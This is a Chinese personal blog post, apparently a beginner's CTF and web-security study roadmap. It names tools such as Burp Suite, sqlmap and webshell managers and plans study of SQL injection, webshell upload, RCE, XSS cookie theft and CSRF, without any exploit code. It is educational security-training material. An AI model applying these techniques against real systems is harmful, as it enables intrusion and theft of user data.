<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>Hexo</title>
  <meta name="description" content="学习平台https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1eq4y1x71H?p&#x3D;5&amp;vd_source&#x3D;51ce6b684d2afd4de72a9121533cd3ca\https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1eq4y1x71H?p&#x3D;5&amp;vd_source&#x3D;51ce6b684d2afd4de72a9121533cd3ca练习平台ht">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2023/08/1b0a1e9c8caf.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="学习平台https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1eq4y1x71H?p&#x3D;5&amp;vd_source&#x3D;51ce6b684d2afd4de72a9121533cd3ca\https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1eq4y1x71H?p&#x3D;5&amp;vd_source&#x3D;51ce6b684d2afd4de72a9121533cd3ca练习平台ht">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://images-1314484890.cos.ap-nanjing.myqcloud.com/Obsidian/202308021038410.png">
<meta property="og:image" content="file:///C:/Users/Administrator/AppData/Roaming/Tencent/QQ/Temp[5UQ[BL(6~BS2JV6W%7DN6[%S.png">
<meta property="og:image" content="file:///C:/Users/Administrator/AppData/Roaming/Tencent/QQ/Temp%W@GJ$ACOF(TYDYECOKVDYB.png">
<meta property="og:image" content="file:///C:/Users/Administrator/AppData/Roaming/Tencent/QQ/Temp%W@GJ$ACOF(TYDYECOKVDYB.png">
<meta property="og:image" content="file:///C:/Users/Administrator/AppData/Roaming/Tencent/QQ/Temp%W@GJ$ACOF(TYDYECOKVDYB.png">
<meta property="og:image" content="https://images-1314484890.cos.ap-nanjing.myqcloud.com/Obsidian/202308021505060.png">
<meta property="article:published_time" content="2023-08-02T02:38:51.478Z">
<meta property="article:modified_time" content="2023-09-20T08:42:18.829Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://images-1314484890.cos.ap-nanjing.myqcloud.com/Obsidian/202308021038410.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2023/08/1b0a1e9c8caf.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 6.3.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/limingqian17" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">安xy</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">安_blog</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">项目</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">书单</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/limingqian17" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/cofess" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>go on!</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/%E7%AE%97%E6%B3%95/" style="font-size: 13px;">-算法</a> <a href="/tags/C/" style="font-size: 13px;">C++</a> <a href="/tags/%E7%AE%97%E6%B3%95/" style="font-size: 13px;">算法</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/">culitivate</a><span class="category-list-count">18</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/408/">408</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/408/%E7%AE%97%E6%B3%95/">算法</a><span class="category-list-count">2</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/C/">C++</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/PHP/">PHP</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/Python/">Python</a><span class="category-list-count">2</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/Python/%E7%88%AC%E8%99%AB/">爬虫</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/">java技术栈</a><span class="category-list-count">6</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/Linux/">Linux</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/git/">git</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/java/">java</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/mysql/">mysql</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/java%E6%8A%80%E6%9C%AF%E6%A0%88/vue/">vue</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/other/">other</a><span class="category-list-count">5</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/other/CTF/">CTF</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/other/%E6%95%B0%E5%AD%A6%E5%BB%BA%E6%A8%A1%E7%AC%94%E8%AE%B0/">数学建模笔记</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/culitivate/other/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/">机器学习</a><span class="category-list-count">2</span></li></ul></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/plan/">plan</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/project/">project</a><span class="category-list-count">2</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/project/2023%E6%9A%91%E6%9C%9F%E9%A1%B9%E7%9B%AEhealth/">2023暑期项目health</a><span class="category-list-count">2</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E8%AE%B0%E5%BD%95/">工具记录</a><span class="category-list-count">7</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E8%AE%B0%E5%BD%95/vim/">vim</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E8%AE%B0%E5%BD%95/%E5%BB%BA%E7%AB%99/">建站</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E8%AE%B0%E5%BD%95/%E6%99%AE%E9%80%9A%E8%AF%9D/">普通话</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/">课程笔记</a><span class="category-list-count">19</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/R/">R</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/R/%E5%AE%9E%E9%AA%8C%E4%B8%80/">实验一</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/python/">python</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E5%A4%8D%E6%9D%82%E7%BD%91%E7%BB%9C/">复杂网络</a><span class="category-list-count">2</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E5%A4%8D%E6%9D%82%E7%BD%91%E7%BB%9C/%E5%B0%8F%E5%AE%9E%E9%AA%8C1/">小实验1</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E5%A4%A7%E5%AD%A6%E8%AF%AD%E6%96%87/">大学语文</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E5%AE%89%E5%8D%93%E8%AE%BA%E6%96%87/">安卓论文</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98/">数据挖掘</a><span class="category-list-count">9</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98/%E4%BD%9C%E4%B8%9A/">作业</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A/">实验报告</a><span class="category-list-count">7</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E6%95%B0%E7%90%86%E9%80%BB%E8%BE%91/">数理逻辑</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/%E8%BD%AF%E4%BB%B6%E5%B7%A5%E7%A8%8B%E5%9F%BA%E7%A1%80/">软件工程基础</a><span class="category-list-count">1</span></li></ul></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/09/">九月 2023</a><span class="archive-list-count">14</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/08/">八月 2023</a><span class="archive-list-count">7</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a><span class="archive-list-count">14</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">五月 2023</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/04/">四月 2023</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/03/">三月 2023</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/09/">九月 2022</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-culitivate/other/CTF/CTF笔记" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2023/08/1b0a1e9c8caf.html" class="article-date">
	  <time datetime="2023-08-02T02:38:51.478Z" itemprop="datePublished">2023-08-02</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/culitivate/">culitivate</a>►<a class="article-category-link" href="/categories/culitivate/other/">other</a>►<a class="article-category-link" href="/categories/culitivate/other/CTF/">CTF</a>
  </span>

        

        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2023/08/1b0a1e9c8caf.html#comments" class="article-comment-link">评论</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 4.5k(字)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 17(分)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p><img src="https://images-1314484890.cos.ap-nanjing.myqcloud.com/Obsidian/202308021038410.png" alt="image.png"></p>
<h1 id="学习平台"><a href="#学习平台" class="headerlink" title="学习平台"></a>学习平台</h1><p><img src="file:///C:\Users\Administrator\AppData\Roaming\Tencent\QQ\Temp[5UQ[BL(6~BS2JV6W}N6[%S.png"><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1eq4y1x71H?p=5&vd_source=51ce6b684d2afd4de72a9121533cd3ca">https://www.bilibili.com/video/BV1eq4y1x71H?p=5&amp;vd_source=51ce6b684d2afd4de72a9121533cd3ca</a><br>\<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1eq4y1x71H?p=5&vd_source=51ce6b684d2afd4de72a9121533cd3ca">https://www.bilibili.com/video/BV1eq4y1x71H?p=5&amp;vd_source=51ce6b684d2afd4de72a9121533cd3ca</a><br>练习平台<br><img src="file:///C:\Users\Administrator\AppData\Roaming\Tencent\QQ\Temp%W@GJ$ACOF(TYDYECOKVDYB.png"><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/407953508">https://zhuanlan.zhihu.com/p/407953508</a><br>\<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/407953508">https://zhuanlan.zhihu.com/p/407953508</a></p>
<p><img src="file:///C:\Users\Administrator\AppData\Roaming\Tencent\QQ\Temp%W@GJ$ACOF(TYDYECOKVDYB.png"><a target="_blank" rel="noopener" href="https://blog.csdn.net/wanzt123/article/details/75174675">https://blog.csdn.net/wanzt123/article/details/75174675</a></p>
<p><img src="file:///C:\Users\Administrator\AppData\Roaming\Tencent\QQ\Temp%W@GJ$ACOF(TYDYECOKVDYB.png"><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/393641905">https://zhuanlan.zhihu.com/p/393641905</a></p>
<p><img src="https://images-1314484890.cos.ap-nanjing.myqcloud.com/Obsidian/202308021505060.png" alt="image.png"></p>
<h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><p>Burp Suite<br>·主要功能:<br>1．拦截、查看或者修改网络请求和响应。2.扫描web应用程序的安全漏洞。<br>3．自动化攻击web应用。<br>4．对数据编码和解码。</p>
<p>HackBar<br>浏览器插件<br>帮助测试sql注入，xss漏洞利用</p>
<p>sqlmap<br>sql自动注入工具</p>
<p>webshell管理工具<br>蚁剑：网站管理工具<br>冰蝎：通信过程中使用AES加密<br>哥斯拉：替代工具</p>
<p>安全导航:<br>纳威安全导航: <a target="_blank" rel="noopener" href="https://navisec.it/">https://navisec.it/</a><br>安全圈info:<a target="_blank" rel="noopener" href="https://www.anquanquan.info/">https://www.anquanquan.info/</a><br>渗透师导航:<a target="_blank" rel="noopener" href="https://www.shentoushi.top/">https://www.shentoushi.top/</a></p>
<h1 id="日程安排"><a href="#日程安排" class="headerlink" title="日程安排"></a>日程安排</h1><h2 id="4-1、初期"><a href="#4-1、初期" class="headerlink" title="4.1、初期"></a>4.1、初期</h2><p>刚刚走进大学，入了web安全的坑，面对诸多漏洞必然是迷茫的，这时的首要任务就是打好网站开发的基础，曾有伟人说过-“自己不会做网站，何谈去找网站的漏洞”，在学习漏洞前，了解基本网站架构、基础网站开发原理，基础的前后端知识，能够让你之后的漏洞学习畅通无阻。</p>
<h3 id="0、协议基础：HTTP、TCP-x2F-IP"><a href="#0、协议基础：HTTP、TCP-x2F-IP" class="headerlink" title="0、协议基础：HTTP、TCP&#x2F;IP"></a>0、协议基础：HTTP、TCP&#x2F;IP</h3><h3 id="1、html-css-js（2-3天）"><a href="#1、html-css-js（2-3天）" class="headerlink" title="1、html+css+js（2-3天）"></a>1、html+css+js（2-3天）</h3><p>前端三要素 html、css、js是被浏览器解析的代码，是构成静态页面的基础。也是前端漏洞如xss、csrf的基础。</p>
<p><strong>☆重点了解html和js</strong></p>
<p>推荐学习资料：</p>
<ul>
<li><a href="https://link.zhihu.com/?target=https://www.runoob.com/">https://www.runoob.com/</a></li>
<li><a href="https://link.zhihu.com/?target=https://www.w3school.com.cn/">https://www.w3school.com.cn/</a></li>
</ul>
<p>能力要求：</p>
<ul>
<li>能够写出简单表单，能够通过js获取DOM元素，控制DOM树即可。</li>
</ul>
<h3 id="2、apache-php-（4-5天）"><a href="#2、apache-php-（4-5天）" class="headerlink" title="2、apache+php （4-5天）"></a>2、apache+php （4-5天）</h3><p>推荐使用phpstudy来进行傻瓜式安装，可以少走很多弯路。通过apache+php体会一下网站后端的工作，客户端浏览器通过请求apache服务器上的php脚本，php执行后生成的html页面返回给浏览器进行解析。</p>
<p><strong>☆重点了解php</strong></p>
<p>推荐学习资料：</p>
<ul>
<li><a href="https://link.zhihu.com/?target=https://www.runoob.com/">https://www.runoob.com/</a></li>
<li><a href="https://link.zhihu.com/?target=https://www.w3school.com.cn/">https://www.w3school.com.cn/</a></li>
</ul>
<p>能力要求：</p>
<ul>
<li>了解基本网站原理，了解php基本语法，开发简单动态页面</li>
</ul>
<h3 id="3、mysql-（2-3天）"><a href="#3、mysql-（2-3天）" class="headerlink" title="3、mysql （2-3天）"></a>3、mysql （2-3天）</h3><p>之前已经安装的phpstudy可以轻易的安装mysql。mysql是一款典型的关系型数据库，一般来说，大部分网站都会带有数据库进行数据存储。</p>
<p><strong>☆重点了解sql语句</strong></p>
<p>推荐学习资料：</p>
<ul>
<li><a href="https://link.zhihu.com/?target=https://www.runoob.com/">https://www.runoob.com/</a></li>
<li><a href="https://link.zhihu.com/?target=https://www.w3school.com.cn/">https://www.w3school.com.cn/</a></li>
</ul>
<p>能力要求：</p>
<ul>
<li>能够用sql语句实现增删改查，并且能用php+mysql开发一个增删改查的管理系统（如学生管理系统）</li>
</ul>
<h3 id="4、python-2-3天"><a href="#4、python-2-3天" class="headerlink" title="4、python (2-3天)"></a>4、python (2-3天)</h3><p>虽然 “php是最好的语言”，但它主要还是应用在服务端做网站开发，我们搞安全经常需要写一些脚本或工具来进行诸如密码爆破、目录扫描、攻击自动化等操作，需要一个方便且趁手的编程语言，这里我推荐python</p>
<p><strong>☆重点学习requests、BeautifulSoup、re这三个库</strong></p>
<p>推荐学习资料</p>
<ul>
<li><a href="https://link.zhihu.com/?target=https://www.runoob.com/">https://www.runoob.com/</a></li>
<li><a href="https://link.zhihu.com/?target=https://www.w3school.com.cn/">https://www.w3school.com.cn/</a></li>
</ul>
<p>能力要求：</p>
<ul>
<li>了解python基础语法，能够用python爬取网站上的信息（requests+BeautifulSoup+re）</li>
</ul>
<h3 id="5、burpsuite-（1-2天）"><a href="#5、burpsuite-（1-2天）" class="headerlink" title="5、burpsuite （1-2天）"></a>5、burpsuite （1-2天）</h3><p>web安全的工具很多，但我觉得必备的渗透工具还得是它</p>
<p>重点学习Proxy、Repeater、Intruder三个模块，分别用于抓包放包、重放包、爆破</p>
<p>初步使用即可，在中期的漏洞学习中去逐渐熟练它</p>
<p>推荐学习资料</p>
<ul>
<li>DVWA之暴力破解</li>
</ul>
<p>能力要求：</p>
<ul>
<li>能够用burpsuite抓包改包、爆破用户名密码</li>
</ul>
<h2 id="4-2、中期"><a href="#4-2、中期" class="headerlink" title="4.2、中期"></a>4.2、中期</h2><p>此时我们对网站已经不再陌生，能够自己动手完成一个简单站点。但我们写出来的代码真的安全吗？进入中期，我们便要开始着眼经典漏洞的学习。</p>
<p>一个漏洞的学习，要搞明白三点（每学完一个漏洞就问自己这三个问题）：</p>
<ul>
<li>如何利用这个漏洞？</li>
<li>为什么会产生这个漏洞？</li>
<li>如何修复这个漏洞？</li>
</ul>
<h3 id="1、SQL注入（7-8天）"><a href="#1、SQL注入（7-8天）" class="headerlink" title="1、SQL注入（7-8天）"></a>1、SQL注入（7-8天）</h3><p>我们web狗学习的第一个漏洞一般都是SQL注入，它是web安全经典fg中的经典，也是在这里被灌输 “永远不信任用户的输入” 的口号，即使是现在sql注入也依旧存在，并且它还在不断衍生出如nosql注入、ORM注入等，可谓防不胜防。</p>
<p>推荐学习资料：</p>
<ul>
<li>sqli-labs：如何使用它网上有很多教学，wp也有很多大佬写了 这里贴一个<a href="https://link.zhihu.com/?target=https://blog.csdn.net/wang_624/article/details/101913584">https://blog.csdn.net/wang_624&#x2F;article&#x2F;details&#x2F;101913584</a></li>
<li>sqlmap：sql注入神器，有余力可以去看看它的源码，学习一下大佬进行sql注入并把它自动化的思路</li>
<li>buuctf：找相关的真题进行练习 wp百度一搜就有</li>
<li>[极客大挑战 2019]EasySQL</li>
<li>[极客大挑战 2019]LoveSQL</li>
<li>[SUCTF 2019]EasySQL</li>
</ul>
<p>能力要求：</p>
<ul>
<li>能够手工注入出任意表的数据，熟悉三种盲注的手法，能够通过sql注入实现任意文件读取和任意文件写入，能够自己编写一个不含sql注入的查询功能</li>
</ul>
<h3 id="2、文件上传（7-8天）"><a href="#2、文件上传（7-8天）" class="headerlink" title="2、文件上传（7-8天）"></a>2、文件上传（7-8天）</h3><p>webshell是可以进行代码执行的木马</p>
<p>而文件上传其实就是想办法把webshell上传到目标的服务器上去并成功解析，达到控制目标服务器的目的，这也是web安全的一个重点内容</p>
<p>推荐学习资料</p>
<ul>
<li>upload-labs：几乎涵盖所有上传漏洞类型</li>
<li>buuctf：找相关的真题进行练习（[ACTF2020 新生赛]Upload）</li>
<li>趁手的webshell管理工具： 蚁剑</li>
</ul>
<p>能力要求：</p>
<ul>
<li>会写php的webshell，明白webshell的原理，熟悉常见的文件上传绕过方法（如过后缀检测、过文件头检测、过MIME类型检测），能够自己编写一个不含漏洞的上传功能</li>
</ul>
<h3 id="3、其他漏洞（14-15天）"><a href="#3、其他漏洞（14-15天）" class="headerlink" title="3、其他漏洞（14-15天）"></a>3、其他漏洞（14-15天）</h3><p>以上两个漏洞是我认为一个初学者最应该掌握也是最典型的漏洞，涵盖了代码执行、文件操作、数据库操作等web应用的主体内容。然而web安全的世界还有很多的漏洞需要你去探索，不过学会了这两种漏洞的你去学其他漏洞定然是游刃有余，不会像刚开始那么困惑了。</p>
<p>以下四个为中期要掌握的漏洞</p>
<ul>
<li>命令执行（RCE）：php常见的代码执行（eval）、命令执行（system）函数</li>
<li>文件包含：file协议、php伪协议的利用</li>
<li>XSS：通过XSS获取用户cookie</li>
<li>CSRF：通过csrf让用户点击恶意链接就触发敏感操作</li>
</ul>
<h2 id="4-3、后期"><a href="#4-3、后期" class="headerlink" title="4.3、后期"></a>4.3、后期</h2><p>此时的你熟悉了web安全几个核心的漏洞，并且有了一些ctf题目的练习经验，已经是一个合格的ctfer了。恭喜你。成功入门web安全。后续的学习方法或许该由你自己决定，我在此只给一些建议。</p>
<h1 id="学习笔记"><a href="#学习笔记" class="headerlink" title="学习笔记"></a>学习笔记</h1><p><a target="_blank" rel="noopener" href="https://www.wolai.com/ctfhub/bRAuA3ejCzD2461TFrJada">基础知识 (wolai.com)</a></p>
<ul>
<li><strong>MISC（安全杂项）</strong>：全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等，覆盖面比较广。我们平时看到的社工类题目；给你一个流量包让你分析的题目；取证分析题目，都属于这类题目。主要考查参赛选手的各种基础综合知识，考察范围比较广。</li>
<li><strong>PPC（编程类）</strong>：全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写，批量处理等，有时候用编程去处理问题，会方便的多。当然PPC相比ACM来说，还是较为容易的。至于编程语言嘛，推荐使用Python来尝试。这部分主要考察选手的快速编程能力。</li>
<li><strong>CRYPTO（密码学）</strong>：全称Cryptography。题目考察各种加解密技术，包括古典加密技术、现代加密技术甚至出题者自创加密技术。实验吧“角斗场”中，这样的题目汇集的最多。这部分主要考查参赛选手密码学相关知识点。</li>
<li><strong>REVERSE（逆向）</strong>：全称reverse。题目涉及到软件逆向、破解技术等，要求有较强的反汇编、反编译扎实功底。需要掌握汇编，堆栈、寄存器方面的知识。有好的逻辑思维能力。主要考查参赛选手的逆向分析能力。此类题目也是线下比赛的考察重点。</li>
<li><strong>STEGA（隐写）</strong>：全称Steganography。隐写术是我开始接触CTF觉得比较神奇的一类，知道这个东西的时候感觉好神奇啊，黑客们真是聪明。题目的Flag会隐藏到图片、音频、视频等各类数据载体中供参赛选手获取。载体就是图片、音频、视频等，可能是修改了这些载体来隐藏flag，也可能将flag隐藏在这些载体的二进制空白位置。有时候需要你侦探精神足够的强，才能发现。此类题目主要考查参赛选手的对各种隐写工具、隐写算法的熟悉程度。实验吧“角斗场”的隐写题目在我看来是比较全的，以上说到的都有涵盖。新手盆友们可以去了解下。</li>
